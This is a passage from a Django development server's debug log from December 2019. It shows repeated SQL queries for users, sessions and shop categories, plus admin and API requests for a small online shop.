'8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 47, 34, 663479, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:47:34,685 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:47:34,689 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 08:47:34,753 utils 11259 139831317362432 (0.001) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:47:34,798 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:47:34.795609+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 47, 34, 795609, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:47:34] "GET /shop/category/6/change/ HTTP/1.0" 200 8009 DEBUG 2019-12-13 08:47:35,143 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:47:35.128579+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 47, 35, 128579, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:47:35,147 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:47:35] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 08:47:38,551 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:47:38.536476+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 47, 38, 536476, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:47:38,555 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:47:38,559 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 08:47:38,568 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."name" = 'EXPLOSIONS' AND NOT ("shop_category"."id" = 6)) LIMIT 1; args=('EXPLOSIONS', 6) DEBUG 2019-12-13 08:47:38,571 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "name" = 'EXPLOSIONS', "parent_id" = NULL, "image" = 'categories/2019/12/07/collection6.png', "description" = 'EXPLOSIONS', "popular" = true, "slug" = 'explosions' WHERE "shop_category"."id" = 6; args=('EXPLOSIONS', 'categories/2019/12/07/collection6.png', 'EXPLOSIONS', True, 'explosions', 6) DEBUG 2019-12-13 08:47:38,574 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T08:47:38.572679+00:00'::timestamptz, 6, 8, '6', 'EXPLOSIONS', 2, '[{"changed": {"fields": ["popular"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 8, 47, 38, 572679, tzinfo=), 6, 8, '6', 'EXPLOSIONS', 2, '[{"changed": {"fields": ["popular"]}}]') [13/Dec/2019 08:47:38] "POST /shop/category/6/change/ HTTP/1.0" 302 0 DEBUG 2019-12-13 08:47:38,880 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:47:38.867349+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 47, 38, 867349, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:47:38,885 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:47:38,889 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:47:38,890 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:47:38,898 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 08:47:39,011 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:47:39.009418+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 47, 39, 9418, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:47:39] "GET /shop/category/ HTTP/1.0" 200 6940 DEBUG 2019-12-13 08:47:39,346 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:47:39.331220+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 47, 39, 331220, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:47:39,350 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:47:39] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 08:47:42,227 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:47:42,232 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:47:42,235 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:47:42,238 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:47:42,242 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:47:42,246 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:47:42,250 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:47:42,255 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:47:42,259 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:47:42,263 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:47:42,266 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:47:42] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:48:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:49:37,881 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:49:37,889 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:49:37,893 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:49:37,897 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:49:37,901 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:49:37,905 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:49:37,908 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:49:37,912 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:49:37,916 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:49:37,920 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:49:37,924 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:49:37] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:51:21,795 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:51:21,800 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:51:21,803 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:51:21,805 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:51:21,807 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:51:21,810 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:51:21,812 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:51:21,815 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:51:21,817 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:51:21,819 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:51:21,821 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:51:21] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:51:55,216 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:51:55,224 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:51:55,228 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:51:55,231 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:51:55,234 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:51:55,237 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:51:55,239 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:51:55,242 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:51:55,244 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:51:55,247 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:51:55,249 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" 